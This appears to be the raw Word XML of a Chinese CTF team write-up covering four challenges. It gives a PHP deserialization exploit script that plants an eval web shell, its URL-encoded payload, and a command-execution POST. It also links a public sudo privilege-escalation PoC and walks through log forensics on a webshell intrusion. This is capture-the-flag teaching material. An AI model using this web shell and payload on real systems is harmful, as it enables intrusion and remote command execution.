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A576A">
      <w:pPr>
        <w:pStyle w:val="49"/>
        <w:rPr>
          <w:rStyle w:val="48"/>
          <w:rFonts w:hint="default" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>焰色天河战队 WriteUp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC4CC5C">
      <w:pPr>
        <w:pStyle w:val="49"/>
        <w:rPr>
          <w:rStyle w:val="48"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F2C07FD">
      <w:pPr>
        <w:pStyle w:val="49"/>
        <w:rPr>
          <w:rStyle w:val="48"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>排名：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7982E5FC">
      <w:pPr>
        <w:pStyle w:val="49"/>
        <w:rPr>
          <w:rStyle w:val="48"/>
          <w:rFonts w:hint="default" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>焰色天河：87</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7855D0BA">
      <w:pPr>
        <w:pStyle w:val="49"/>
        <w:rPr>
          <w:rStyle w:val="48"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B088425">
      <w:pPr>
        <w:pStyle w:val="49"/>
        <w:rPr>
          <w:rStyle w:val="48"/>
          <w:rFonts w:hint="default" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>一．浅析php原生类：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0992529B">
      <w:pPr>
        <w:pStyle w:val="49"/>
        <w:rPr>
          <w:rStyle w:val="48"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>经典的反序列化：我们贴一下exp：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7887DD69">
      <w:pPr>
        <w:pStyle w:val="49"/>
        <w:rPr>
          <w:rStyle w:val="4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</w:pP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&lt;?php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69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header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(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="6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"Content-Type: text/plain"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)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class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install {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private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$username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private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$password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public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function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3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__construct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(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$username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,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$password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) {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   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$this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-&gt;username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$username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   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$this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-&gt;password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$password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}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}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class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Until {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public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$a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public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$b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  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public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$c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}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$inner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new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Until()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$inner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-&gt;a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6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"ZipArchive"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$inner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-&gt;b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6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"install.lock"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$inner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-&gt;c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54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8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$middle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new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install(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$inner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,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6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"pad"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)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$breaker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new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install(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$middle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,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6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"pad"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)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$shell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6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'&lt;?php @eval($_POST["cmd"]);?&gt;'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$writer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new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install(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$shell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,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6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"pad"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)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$payload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=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[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$writer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,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$breaker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]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echo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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="69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urlencode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(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="69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serialize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(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="70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$payload</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="8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))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="68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;</w:t>
      </w:r>
      <w:r>
        <w:rPr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br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="52"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:highlight w:val="yellow"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="accent6"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A55F7A">
      <w:pPr>
        <w:pStyle w:val="49"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
        </w:rPr>
        <w:t>?data=a%3A2%3A%7Bi%3A0%3BO%3A7%3A%22install%22%3A2%3A%7Bs%3A17%3A%22%00install%00username%22%3Bs%3A29%3A%22%3C%3Fphp+%40eval%28%24_POST%5B%22cmd%22%5D%29%3B%3F%3E%22%3Bs%3A17%3A%22%00install%00password%22%3Bs%3A3%3A%22pad%22%3B%7Di%3A1%3BO%3A7%3A%22install%22%3A2%3A%7Bs%3A17%3A%22%00install%00username%22%3BO%3A7%3A%22install%22%3A2%3A%7Bs%3A17%3A%22%00install%00username%22%3BO%3A5%3A%22Until%22%3A3%3A%7Bs%3A1%3A%22a%22%3Bs%3A10%3A%22ZipArchive%22%3Bs%3A1%3A%22b%22%3Bs%3A12%3A%22install.lock%22%3Bs%3A1%3A%22c%22%3Bi%3A8%3B%7Ds%3A17%3A%22%00install%00password%22%3Bs%3A3%3A%22pad%22%3B%7Ds%3A17%3A%22%00install%00password%22%3Bs%3A3%3A%22pad%22%3B%7D%7D</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BE82B0B">
      <w:pPr>
        <w:pStyle w:val="49"/>
        <w:rPr>
          <w:rStyle w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>原来的url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
        </w:rPr>
        <w:t>/config.php</w:t>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
        </w:rPr>
        <w:t>POST:cmd=system('cat /f*');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61506B1D">
      <w:pPr>
        <w:pStyle w:val="49"/>
        <w:rPr>
          <w:rStyle w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5477510" cy="2762250"/>
            <wp:effectExtent l="0" t="0" r="889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5419">
      <w:pPr>
        <w:pStyle w:val="49"/>
        <w:rPr>
          <w:rStyle w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11555834">
      <w:pPr>
        <w:pStyle w:val="49"/>
        <w:rPr>
          <w:rStyle w:val="48"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>二：最近还好吗</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B0BB393">
      <w:pPr>
        <w:pStyle w:val="49"/>
        <w:rPr>
          <w:rStyle w:val="48"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>这个题就是直接那一个cvepoc就好了</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E44936B">
      <w:pPr>
        <w:pStyle w:val="49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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="48"/>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>访问：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instrText xml:space="preserve"> HYPERLINK "https://github.com/kh4sh3i/CVE-2025-32463" </w:instrTex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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="20"/>
          <w:rFonts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https://github.com/kh4sh3i/CVE-2025-32463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fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E4F7D3">
      <w:pPr>
        <w:pStyle w:val="49"/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获取验证poc，然后在服务器上执行即可提权</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7833631B">
      <w:pPr>
        <w:pStyle w:val="49"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5479415" cy="3783330"/>
            <wp:effectExtent l="0" t="0" r="698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0FE6">
      <w:pPr>
        <w:pStyle w:val="49"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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我嘞个超级马里奥</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EFCEE5">
      <w:pPr>
        <w:pStyle w:val="49"/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这个题直接通关就行了，通关就弹flag：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3D7DF5">
      <w:pPr>
        <w:pStyle w:val="49"/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484495" cy="871855"/>
            <wp:effectExtent l="0" t="0" r="1905" b="12065"/>
            <wp:docPr id="3" name="图片 3" descr="fcff902aa882fb74818f28d68619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cff902aa882fb74818f28d68619d1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76A0">
      <w:pPr>
        <w:pStyle w:val="49"/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具体不演示了，自己玩吧</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D29F7A1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>四：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> EzRCE</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="3A3C967F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据木马名称查找，</w:t>
      </w:r>
      <w:r>
        <w:t>日志中应该有一条 POST 或 PUT 请求，目标文件是 banner_home.jpg，时间就是事发日期，来源 IP 就是黑客 IP。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="3134995"/>
            <wp:effectExtent l="0" t="0" r="13970" b="4445"/>
            <wp:docPr id="29034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4075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F782">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>2.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找到黑客IP，再查找当天访问过都的对应</w:t>
      </w:r>
      <w:r>
        <w:t>jsp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7154C4FF">
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1687195"/>
            <wp:effectExtent l="0" t="0" r="13970" b="4445"/>
            <wp:docPr id="70606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406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40030"/>
            <wp:effectExtent l="0" t="0" r="13970" b="3810"/>
            <wp:docPr id="107634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072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8BBC">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3、最后拼接flag</w:t>
      </w:r>
      <w:r>
        <w:t>{2018-2-23/183.62.9.42/table.jsp-en.jsp-2.jsp}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FA79A7">
      <w:r>
        <w:t>exp不允许截图， 请粘贴代码，关键步骤需要有详细截图</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EAAB09"/>
    <w:p w14:paraId="5C046DFB">
      <w:pPr>
        <w:pStyle w:val="49"/>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsia="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN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EC71C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="8B3EC71C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4B57EB7"/>
    <w:rsid w:val="5814296E"/>
    <w:rsid w:val="717045FD"/>
    <w:rsid w:val="77C831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167</Words>
  <Characters>1421</Characters>
  <Lines>12</Lines>
  <Paragraphs>8</Paragraphs>
  <TotalTime>0</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>1538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2025-11-24T12:33:00Z</dcterms:created>
  <dc:creator>我叫（  ）（  ）</dc:creator>
  <cp:lastModifiedBy>我叫（  ）（  ）</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-24T14:50:27Z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eyJoZGlkIjoiYmVmZGU4ZWVmM2JkMzNiNGYzMmIwYmZlOGE0MGY2YmEiLCJ1c2VySWQiOiI4MzA2NjYxMDkifQ==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BF9F51748B264D35868D16A4DD8747EA_12</vt:lpwstr>
  </property>
</Properties>
</file>